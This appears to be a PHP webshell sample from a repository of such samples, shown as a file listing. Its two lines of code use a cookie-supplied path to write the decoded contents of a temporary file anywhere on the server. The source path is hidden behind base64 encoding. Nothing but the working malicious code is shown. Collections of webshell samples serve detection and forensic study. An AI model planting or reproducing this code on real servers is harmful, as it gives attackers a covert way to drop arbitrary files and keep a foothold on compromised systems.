webshell/php/20220213_04.php
2022-02-13 22:33:58 +08:00

2 lines
149 B
PHP

<?php
if(@$_COOKIE['path'] != ""){file_put_contents($_COOKIE['path'], base64_decode(file_get_contents(base64_decode("L3RtcC90bXA0RTE1LnRtcA=="))));}